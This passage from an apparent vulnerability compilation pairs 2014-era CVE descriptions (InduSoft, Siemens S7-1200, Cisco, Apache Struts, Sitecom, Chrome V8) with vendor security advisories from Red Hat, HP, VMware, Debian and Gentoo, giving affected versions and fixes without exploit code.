http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0499 [ 3 ] CVE-2014-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0502 [ 4 ] CVE-2014-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0503 [ 5 ] CVE-2014-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0504 [ 6 ] CVE-2014-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0506 [ 7 ] CVE-2014-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0507 [ 8 ] CVE-2014-0508 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0508 [ 9 ] CVE-2014-0509 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0509 [ 10 ] CVE-2014-0515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0515 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201405-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2014:0447-01 Product: Red Hat Enterprise Linux Supplementary Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-0447.html Issue date: 2014-04-29 CVE Names: CVE-2014-0515 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes one security issue is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. This vulnerability is detailed in the Adobe Security Bulletin APSB14-13, listed in the References section. A flaw was found in the way flash-plugin displayed certain SWF content. An attacker could use this flaw to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. 4. Solution: Before applying this update, make sure all previously released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/site/articles/11258 5. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.356-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.356-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.356-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.356-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.356-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.356-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.356-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.356-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.356-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.356-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2014-0515.html https://access.redhat.com/security/updates/classification/#critical https://helpx.adobe.com/security/products/flash-player/apsb14-13.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2014 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFTYCvjXlSAg2UNWIIRAo9cAJ9+xjq+IArfYWnElZ3eS4DDSMRNfgCfTUtG +MNXS/YC8jqbPt7rn6VE0cA= =5N+u -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Directory traversal vulnerability in NTWebServer in InduSoft Web Studio 7.1 before SP2 Patch 4 allows remote attackers to read administrative passwords in APP files, and consequently execute arbitrary code, via unspecified web requests. Authentication is not required to exploit this vulnerability. The specific flaw exists within the ability to browse outside of the web root via directory traversal. A remote attacker can abuse this to download sensitive files and execute remote code under the context of the user. InduSoft Web Studio is a complete graphics control software that includes the various functional modules required to develop Human Machine Interface (HMI), Management Control, Data Acquisition System (SCADA) and embedded control. InduSoft Web Studio is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. Exploiting this issue will allow an attacker to view arbitrary files within the context of the web server. Information harvested may aid in launching further attacks. InduSoft Web Studio 7.1 is vulnerable; other versions may also be affected

Cross-site scripting (XSS) vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. Siemens SIMATIC is an automation software in a single engineering environment. A cross-site scripting vulnerability exists in Siemens SIMATIC S7-1200. Because some unspecified input is not properly filtered before being used, an attacker can exploit the vulnerability to execute arbitrary HTML and script code in a user's browser session at the affected site. Siemens SIMATIC S7-1200 is prone to an unspecified cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input before being returned to the user. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. SIMATIC S7-1200 versions 2.x and 3.x are vulnerable. Siemens SIMATIC S7-1200 is a programmable logic controller (PLC) used in small and medium-sized automation systems of Siemens, Germany

The server in HP Integrated Lights-Out 2 (aka iLO 2) 2.23 and earlier allows remote attackers to cause a denial of service via crafted HTTPS traffic, as demonstrated by traffic from a CVE-2014-0160 vulnerability-assessment tool. HP Integrated Lights-Out is prone to a remote denial-of-service vulnerability. Exploiting this issue allows remote attackers to trigger denial-of-service conditions. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04244787 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04244787 Version: 1 HPSBHF03006 rev.1 - HP Integrated Lights-Out 2 (iLO 2) Denial of Service NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2014-04-24 Last Updated: 2014-04-24 Potential Security Impact: Denial of Service. The denial of service condition occurs only when the iLO 2 is scanned by vulnerability assessment tools that test for CVE-2014-0160 (Heartbleed vulnerability). iLO 2 servers are not vulnerable to CVE-2014-0160. References: CVE-2014-2601, SSRT101509 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-2601 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following firmware updates available to resolve this vulnerability: Please note that this firmware update does not apply to p-class blades (BL20p G4, BL25p G2, and BL45p G2). A separate firmware release will be made available for those systems. Online ROM Flash Component for Windows x86 ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p1443420321/v96367 Online ROM Flash Component for Windows x64 ftp://ftp.hp.com/pub/softlib2/software1/sc-windows-fw-ilo/p2023401934/v96368 Linux Online Flash Component ftp://ftp.hp.com/pub/softlib2/software1/sc-linux-fw-ilo/p1285463034/v96369 HISTORY Version:1 (rev.1) - 24 April 2014 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.13 (GNU/Linux) iEYEARECAAYFAlNZIVMACgkQ4B86/C0qfVlLDgCeLGHy2eFzRdumcQvrJ2BPQ7Tv 4XkAmwamdnoBJwk4PWXXgd5MTFQ7kYCP =XOP2 -----END PGP SIGNATURE-----

CRLF injection vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary HTTP headers via unspecified vectors. Siemens SIMATIC is an automation software in a single engineering environment. Since some unknown input is not properly filtered before being used to display the HTTP header, the attacker can use the HTTP header of the vulnerability to send the response to the user. Siemens SIMATIC S7-1200 is prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input. Attackers can leverage this issue to influence or misrepresent how web content is served, cached, or interpreted. This could aid in various attacks that try to entice client users into a false sense of trust. SIMATIC S7-1200 2.x and 3.x versions are vulnerable. Siemens SIMATIC S7-1200 is a programmable logic controller (PLC) used in small and medium-sized automation systems of Siemens, Germany

Cisco IOS before 15.3(2)S allows remote attackers to bypass interface ACL restrictions in opportunistic circumstances by sending IPv6 packets in an unspecified scenario in which expected packet drops do not occur for "a small percentage" of the packets, aka Bug ID CSCty73682. Cisco IOS Has an interface ACL A vulnerability exists that circumvents the restriction. Cisco IOS is the interconnected network operating system used on most Cisco system routers and network switches. This issue allows remote attackers to bypass security restrictions and perform unauthorized actions. This may aid in further attacks. This issue is tracked by Cisco Bug ID CSCty73682

Cisco ASR 1000 devices with software before 3.8S, when BDI routing is enabled, allow remote attackers to cause a denial of service (device reload) via crafted (1) broadcast or (2) multicast ICMP packets with fragmentation, aka Bug ID CSCub55948. The Cisco ASR 1000 Series Aggregation Services Routers drive the transformation of service providers and enterprise network edge areas with their compact form factor, industry-leading performance, instant service capabilities and high smoothness. The Cisco ASR 1000 Series Routers are prone to a denial-of-service vulnerability. Attackers can exploit this issue to cause the affected device to reload, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCub55948

ParametersInterceptor in Apache Struts before 2.3.20 does not properly restrict access to the getClass method, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via a crafted request. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-0094. Apache Struts provided by the Apache Software Foundation is a software framework for creating Java web applications. Apache Struts contains a vulnerability where the ClassLoader may be manipulated. NTT-CERT reported this vulnerability to IPA. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Summary: A minor version update (from 7.2 to 7.3) is now available for Red Hat Fuse. The purpose of this text-only errata is to inform you about the security issues fixed in this release. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section. Description: This release of Red Hat Fuse 7.3 serves as a replacement for Red Hat Fuse 7.2, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References. Security Fix(es): * jackson-databind: A deserialization flaw was discovered in the jackson-databind which could allow an unauthenticated user to perform code execution by sending the maliciously crafted input to the readValue method of the ObjectMapper. (CVE-2017-7525) * struts2: ClassLoader manipulation via request parameters (CVE-2014-0112) * jetty: HTTP request smuggling (CVE-2017-7657) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Solution: Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on. Installation instructions are available from the Fuse 7.3.0 product documentation page: https://access.redhat.com/documentation/en-us/red_hat_fuse/7.3/ 4. Bugs fixed (https://bugzilla.redhat.com/): 1091939 - CVE-2014-0112 struts2: ClassLoader manipulation via request parameters 1462702 - CVE-2017-7525 jackson-databind: Deserialization vulnerability via readValue method of ObjectMapper 1595620 - CVE-2017-7657 jetty: HTTP request smuggling 5. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ VMware Security Advisory Advisory ID: VMSA-2014-0007 Synopsis: VMware product updates address security vulnerabilities in Apache Struts library Issue date: 2014-06-24 Updated on: 2014-06-24 (Initial Advisory) CVE number: CVE-2014-0050, CVE-2014-0094, CVE-2014-0112 - ------------------------------------------------------------------------ 1. Summary VMware product updates address security vulnerabilities in Apache Struts library 2. Relevant releases VMware vCenter Operations Management Suite prior to 5.8.2 3. Problem Description a. The Apache Struts library is updated to version 2.3.16.2 to address multiple security issues. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2014-0050, CVE-2014-0094, and CVE-2014-0112 to these issues. CVE-2014-0112 may lead to remote code execution. This issue was found to be only partially addressed in CVE-2014-0094. CVE-2014-0050 may lead to a denial of service condition. vCenter Operations Management Suite (vCOps) is affected by both CVE-2014-0112 and CVE-2014-0050. Exploitation of CVE-2014-0112 may lead to remote code execution without authentication. vCenter Orchestrator (vCO) is affected by CVE-2014-0050 and not by CVE-2014-0112. Workaround A workaround for CVE-2014-0112 is documented in VMware Knowledge Base article 2081470. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= vCOPS 5.8.x any vCOPS 5.8.2 vCOPS 5.7.x any patch pending * vCO 5.5 any patch pending vCO 5.1 any patch pending vCO 4.2 any patch pending *Customers are advised to apply the workaround or update to vCOps 5.8.2. 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. vCenter Operations Management Suite 5.8.2 ----------------------------------------- Downloads and Documentation: https://www.vmware.com/go/download-vcops 5. References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0050 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0094 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0112 http://kb.vmware.com/kb/2081470 - ------------------------------------------------------------------------ 6. Change log 2014-06-24 VMSA-2014-0007 Initial security advisory in conjunction with the release of vCenter Operations Management Suite 5.8.2 on 2014-06-24. - ------------------------------------------------------------------------ 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: security-announce at lists.vmware.com bugtraq at securityfocus.com fulldisclosure at seclists.org E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware Security Response Policy https://www.vmware.com/support/policies/security_response.html VMware Lifecycle Support Phases https://www.vmware.com/support/policies/lifecycle.html Twitter https://twitter.com/VMwareSRC Copyright 2014 VMware Inc. All rights reserved. -----BEGIN PGP SIGNATURE----- Version: Encryption Desktop 10.3.2 (Build 15337) Charset: utf-8 wj8DBQFTqi0BDEcm8Vbi9kMRAnCKAJ9otVO7DlXuMnSEGh2TLBzS5hniKgCeMnAM CZ5+DYZAydCjMwVgtKqoo7Y= =Vwu5 -----END PGP SIGNATURE-----

SITECOM WLR-4000/ WLR-4004 is a router. Multiple Sitecom products have an Admin cryptographic key security restriction bypass vulnerability, as the device generates a predictive way of managing passwords and WPA2 passphrases. Allows remote attackers to more easily obtain this information, allowing them to potentially access the device. This may lead to other attacks. The following products are vulnerable: Sitecom WLR-4000 v1 001 Sitecom WLR-4004 v1 001

Integer overflow in api.cc in Google V8, as used in Google Chrome before 34.0.1847.131 on Windows and OS X and before 34.0.1847.132 on Linux, allows remote attackers to cause a denial of service or possibly have unspecified other impact via a large length value. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Google Chrome. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of ImageData objects. In certain conditions, an attacker would be able to read and write pixel data. An attacker can leverage this vulnerability to execute code under the context of the current process. Failed exploit attempts may result in a denial-of-service condition. Versions prior to Chrome 34.0.1847.131 and 34.0.1847.132 are vulnerable. Google Chrome is a web browser developed by Google (Google). An integer overflow vulnerability exists in the api.cc file of Google V8. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2920-1 security@debian.org http://www.debian.org/security/ Michael Gilbert May 03, 2014 http://www.debian.org/security/faq - ------------------------------------------------------------------------- Package : chromium-browser CVE ID : CVE-2014-1730 CVE-2014-1731 CVE-2014-1732 CVE-2014-1733 CVE-2014-1734 CVE-2014-1735 CVE-2014-1736 Several vulnerabilities have been discovered in the chromium web browser. CVE-2014-1730 A type confusion issue was discovered in the v8 javascript library. CVE-2014-1731 John Butler discovered a type confusion issue in the WebKit/Blink document object model implementation. CVE-2014-1732 Khalil Zhani discovered a use-after-free issue in the speech recognition feature. CVE-2014-1733 Jed Davis discovered a way to bypass the seccomp-bpf sandbox. CVE-2014-1734 The Google Chrome development team discovered and fixed multiple issues with potential security impact. CVE-2014-1735 The Google Chrome development team discovered and fixed multiple issues in version 3.24.35.33 of the v8 javascript library. CVE-2014-1736 SkyLined discovered an integer overlflow issue in the v8 javascript library. For the stable distribution (wheezy), these problems have been fixed in version 34.0.1847.132-1~deb7u1. For the testing distribution (jessie), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 34.0.1847.132-1. We recommend that you upgrade your chromium-browser packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1 iQQcBAEBCgAGBQJTZWJ6AAoJELjWss0C1vRzK+sgALIEDCn9Ud3owKNxdM6sglkB /yx9toTplWx2reGXn4qyfNPtxQMbS9AyIhcLEKMbIIrXaEY9CjB+JhfP6IC0RPCJ NLPd21uDo63LhiCkgtbNgftPcDK6NwaPy67Uui64zI/MkB6me4C3ECZB2nxmjNAO 0OJQMDQv217ei1w8QCIofouUbJU4Vq56mxpX7tEVUPJkgA6FE4aUNcrxKcKhdnxU WtUW49d1Q+6RcJjthugyWppzb9N+0ClxNpRADzMa5jgaiQxEBuRJewipiJhTQg5l XTB2o6V8G/+NWEqTJPe7t+QKwERE9yUp4pyiwMolttJffKm7ipgbDdIHTan/LYfu A5CQFT7cre7l4r90YtgAo/da/kwDs6whTAoiFb6hxhLLgarpsO5WjMFrCeGHZek1 weOMO6VbhLDaHJHKQOnIy2shhG850OX4twLznOnqZ2x3XcurhqjZEg8XaiFRQiPU p8d2Qy25XraAQ8fG71LKN7M5h6q8yWkofZFrVysNOSu7zeadZUfmO7OXE9vO4Gqu bA8P/1ihaH0+KcUJsd7yP0Lv+avtww++/4Ak1msUn95OiOynjuJ1e5VtEQFFyRDj fRWcJcG1ssKCIKB8lSuqVXcEyYDS5LpfRTcWJq/6Jutz+N5axWYlDBMZwq75CULR EkW6oUrZtq9dACLTBNtRqPF7ClBV6x42lgZ3nfKTly84/nS3tpsfQv8oKDRsckzm GsJPl/DKm/D73kJyZEqYChxiKE3i4WYmsjltcCXQi0PJzEqGnvFaWsAPISD3EEYz nIwpjBMXAYFyVwp16UcNj7uVjlf9ZQetY5dVEF//I3jjTUMWFadHQ0IYZaHpYRle ZC0fKv6xqGN5krE6ommWvAgkLlQdlupU+FT8abaXWyrnWTHTGi2bOFe0wlXzdUPh gp7zgaOehCI7CsMUxK8VeRXF19K4x1KfGUA+VVUsvXF5G5D6Ucowybi6ObTPqFDA LHDrIIL44cnPU4BqZ/KRfN/f0hfu1hHHD7TmonHbt7JeWIFqEWDvtDI4hx4kjaYc nHt1ZyK2YyGRZwJ8drhJi1+iYSRApx36nvIOZn6fa8rZDCqE1VObPOr6lyexuhge tnTDQta21hkXnyTEs/lYRbWK4K0KK4AXyWCtbiAJOe65/9eSd5Yq48dbfPBLUJSe XKFKhkTo0FNDLB2MsgVikTptvpiFG8dwoOrWqCBz9z23eAhFmVGM/vciNBLNyy2B QtSLd4+VSd/za51sldpN6ZFG4CTm6Z5NWGEnNxptHw5iE6cQHior+snS65HzbsQ5 ykJ5HqSGIsGLSkdeKC44XOfBUU9jU14llMOdf5OKx9vfmX/Hl3T0Z+jWwHpKpWk= =/B/T -----END PGP SIGNATURE-----